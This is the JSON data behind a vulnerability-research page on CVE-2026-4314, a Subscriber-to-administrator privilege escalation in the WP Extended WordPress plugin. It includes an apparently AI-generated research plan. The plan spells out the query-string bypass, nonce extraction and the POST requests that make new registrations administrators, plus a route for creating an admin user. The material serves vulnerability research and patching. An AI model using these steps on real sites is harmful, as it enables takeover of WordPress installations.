[{"data":1,"prerenderedAt":-1},["ShallowReactive",2],{"$f-fcS5luzWyY6xIysRHqUS3bUhp5QA9xIkTG9XB5zcdE":3},{"id":4,"url_slug":5,"title":6,"description":7,"plugin_slug":8,"theme_slug":9,"affected_versions":10,"patched_in_version":11,"severity":12,"cvss_score":13,"cvss_vector":14,"vuln_type":15,"published_date":16,"updated_date":17,"references":18,"days_to_patch":20,"patch_diff_files":21,"patch_trac_url":9,"research_status":27,"research_verified":28,"research_rounds_completed":29,"research_plan":30,"research_summary":9,"research_vulnerable_code":9,"research_fix_diff":9,"research_exploit_outline":9,"research_model_used":31,"research_started_at":32,"research_completed_at":33,"research_error":9,"poc_status":9,"poc_video_id":9,"poc_summary":9,"poc_steps":9,"poc_tested_at":9,"poc_wp_version":9,"poc_php_version":9,"poc_playwright_script":9,"poc_exploit_code":9,"poc_has_trace":28,"poc_model_used":9,"poc_verification_depth":9,"poc_exploit_code_gated":28,"source_links":34},"CVE-2026-4314","the-ultimate-wordpress-toolkit-wp-extended-authenticated-subscriber-privilege-escalation-via-menu-editor-module","The Ultimate WordPress Toolkit – WP Extended \u003C= 3.2.4 - Authenticated (Subscriber+) Privilege Escalation via Menu Editor Module","The 'The Ultimate WordPress Toolkit – WP Extended' plugin for WordPress is vulnerable to Privilege Escalation in all versions up to, and including, 3.2.4. This is due to the `isDashboardOrProfileRequest()` method in the Menu Editor module using an insecure `strpos()` check against `$_SERVER['REQUEST_URI']` to determine if a request targets the dashboard or profile page. The `grantVirtualCaps()` method, which is hooked into the `user_has_cap` filter, grants elevated capabilities including `manage_options` when this check returns true. This makes it possible for authenticated attackers, with Subscriber-level access and above, to gain administrative capabilities by appending a crafted query parameter to any admin URL, allowing them to update arbitrary WordPress options and ultimately create new Administrator accounts.","wpextended",null,"\u003C=3.2.4","3.2.5","high",8.8,"CVSS:3.1\u002FAV:N\u002FAC:L\u002FPR:L\u002FUI:N\u002FS:U\u002FC:H\u002FI:H\u002FA:H","Improper Privilege Management","2026-03-21 14:34:53","2026-03-22 03:26:34",[19],"https:\u002F\u002Fwww.wordfence.com\u002Fthreat-intel\u002Fvulnerabilities\u002Fid\u002F38ea001c-6edb-4f36-a7ec-19be1d857b9e?source=api-prod",1,[22,23,24,25,26],"README.txt","modules\u002Fdisk-usage-widget\u002FBootstrap.php","modules\u002Fmenu-editor\u002FBootstrap.php","modules\u002Fmenu-editor\u002Fincludes\u002FSettingsManager.php","vendor\u002Fautoload.php","researched",false,3,"## Vulnerability Summary\n\nThe **The Ultimate WordPress Toolkit – WP Extended** plugin (versions \u003C= 3.2.4) contains a privilege escalation vulnerability in its **Menu Editor** module. The module hooks into the WordPress `user_has_cap` filter via the `grantVirtualCaps()` method to dynamically grant capabilities to users without writing them to the database.\n\nThe vulnerability stems from an insecure check in `isDashboardOrProfileRequest()`, which uses `strpos()` to check if the `$_SERVER['REQUEST_URI']` contains `\u002Fwp-admin\u002Findex.php` or `\u002Fwp-admin\u002Fprofile.php`. Because `strpos` matches the substring anywhere in the URI, an authenticated attacker (Subscriber or higher) can append one of these strings as a query parameter (e.g., `\u002Fwp-admin\u002Foptions-general.php?ignore=\u002Fwp-admin\u002Findex.php`) to bypass the check. When the check returns `true`, the plugin grants the user the `manage_options` capability for the duration of that request. This allows the attacker to access administrative pages and update arbitrary WordPress options, such as enabling open registration and setting the default role to 'administrator'.\n\n## Attack Vector Analysis\n\n*   **Endpoint:** Any administrative page within `\u002Fwp-admin\u002F`, specifically `options-general.php` (to get nonces) and `options.php` (to save settings).\n*   **Vulnerable Parameter:** `$_SERVER['REQUEST_URI']` (manipulated via query strings).\n*   **Authentication Level:** Authenticated Subscriber or higher.\n*   **Preconditions:** The **Menu Editor** module must be enabled (it is a core feature of the plugin).\n*   **Payload:** Appending `?any_param=\u002Fwp-admin\u002Findex.php` to an admin URL.\n\n## Code Flow\n\n1.  **Entry Point:** An authenticated user makes a request to a protected admin URL, e.g., `\u002Fwp-admin\u002Foptions-general.php?payload=\u002Fwp-admin\u002Findex.php`.\n2.  **Filter Trigger:** WordPress triggers the `user_has_cap` filter to determine if the user can access the page.\n3.  **Vulnerable Hook:** `Wpextended\\Modules\\MenuEditor\\Bootstrap::grantVirtualCaps()` is executed.\n4.  **Insecure Logic:** `grantVirtualCaps` calls `isDashboardOrProfileRequest()`.\n5.  **Bypass:** `isDashboardOrProfileRequest()` (in `modules\u002Fmenu-editor\u002FBootstrap.php`) performs:\n    `strpos($request_uri, '\u002Fwp-admin\u002Findex.php') !== false`.\n    Since the URI contains the string in the query parameters, this returns `true`.\n6.  **Capability Escalation:** `grantVirtualCaps` executes:\n    `$allcaps['manage_options'] = true;`\n7.  **Sinks:**\n    *   The user is granted access to `options-general.php` where they can view the `_wpnonce` for settings.\n    *   The user can then POST to `options.php` (tricking the check again) to update the `default_role` and `users_can_register` options.\n\n## Nonce Acquisition Strategy\n\nThe attacker requires a valid WordPress nonce to update settings via `options.php`. Since the vulnerability grants `manage_options` for any request containing the payload string, the attacker can simply load the settings page to extract the nonce.\n\n1.  **Navigate to the General Settings page** with the bypass string:\n    `URL: \u002Fwp-admin\u002Foptions-general.php?ignore=\u002Fwp-admin\u002Findex.php`\n2.  **Use `browser_eval` to extract the nonce** from the hidden input field:\n    `browser_eval(\"document.querySelector('input[name=\\\"_wpnonce\\\"]').value\")`\n3.  **Identify the `option_page`**:\n    `browser_eval(\"document.querySelector('input[name=\\\"option_page\\\"]').value\")` (This will be `\"general\"`).\n\n## Exploitation Strategy\n\n### Step 1: Extract Nonce\n**Action:** GET request to the General Settings page.\n*   **URL:** `http:\u002F\u002Flocalhost:8080\u002Fwp-admin\u002Foptions-general.php?v=\u002Fwp-admin\u002Findex.php`\n*   **Method:** `GET`\n*   **Target:** Extract values for `_wpnonce` and `_wp_http_referer`.\n\n### Step 2: Escalation to Administrator\n**Action:** POST request to `options.php` to change site registration settings.\n*   **URL:** `http:\u002F\u002Flocalhost:8080\u002Fwp-admin\u002Foptions.php?v=\u002Fwp-admin\u002Findex.php`\n*   **Method:** `POST`\n*   **Headers:** `Content-Type: application\u002Fx-www-form-urlencoded`\n*   **Parameters:**\n    *   `option_page`: `general`\n    *   `action`: `update`\n    *   `_wpnonce`: `[EXTRACTED_NONCE]`\n    *   `_wp_http_referer`: `\u002Fwp-admin\u002Foptions-general.php?v=\u002Fwp-admin\u002Findex.php`\n    *   `users_can_register`: `1`\n    *   `default_role`: `administrator`\n\n## Test Data Setup\n\n1.  **Plugin Installation:** Ensure `wpextended` version 3.2.4 is installed and active.\n2.  **Enable Module:** Ensure the Menu Editor module is active (default).\n3.  **User Creation:** Create a user with the `subscriber` role.\n    `wp user create attacker attacker@example.com --role=subscriber --user_pass=password`\n\n## Expected Results\n\n1.  **Initial State:** Subscriber user cannot access `options-general.php` (returns 403 or redirects to profile).\n2.  **During Exploit (Bypass):** Subscriber user accesses `options-general.php?v=\u002Fwp-admin\u002Findex.php` and sees the full General Settings admin interface.\n3.  **Final State:** The WordPress options `users_can_register` is set to `1` and `default_role` is set to `administrator`.\n\n## Verification Steps\n\n1.  **Verify Option Change:**\n    `wp option get users_can_register` (Should return `1`)\n    `wp option get default_role` (Should return `administrator`)\n2.  **Verify Access:**\n    Log in as the Subscriber user and attempt to navigate to `\u002Fwp-admin\u002Fsettings.php` without the bypass string. If the exploit was permanent in its effect on the site settings, the user can now create new admin accounts via the registration page.\n\n## Alternative Approaches\n\nIf `options.php` is restricted by more than just `manage_options`, use the elevated privileges to access the plugin's own settings or use `admin-ajax.php`.\n\n**Alternative: Admin User Creation**\n1.  Navigate to `\u002Fwp-admin\u002Fuser-new.php?v=\u002Fwp-admin\u002Findex.php`.\n2.  Extract the `_wpnonce_create-user` nonce.\n3.  POST to `\u002Fwp-admin\u002Fuser-new.php?v=\u002Fwp-admin\u002Findex.php` to create a new administrator account directly, provided `grantVirtualCaps` also includes `create_users` (the plugin grants `manage_options`, which in many configurations is sufficient to reach the user creation logic or modify settings that allow it).","gemini-3-flash-preview","2026-04-18 00:31:00","2026-04-18 00:31:59",{"type":35,"vulnerable_version":36,"fixed_version":11,"vulnerable_browse":37,"vulnerable_zip":38,"fixed_browse":39,"fixed_zip":40,"all_tags":41},"plugin","3.2.4","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fwpextended\u002Ftags\u002F3.2.4","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Fwpextended.3.2.4.zip","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fwpextended\u002Ftags\u002F3.2.5","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Fwpextended.3.2.5.zip","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fwpextended\u002Ftags"]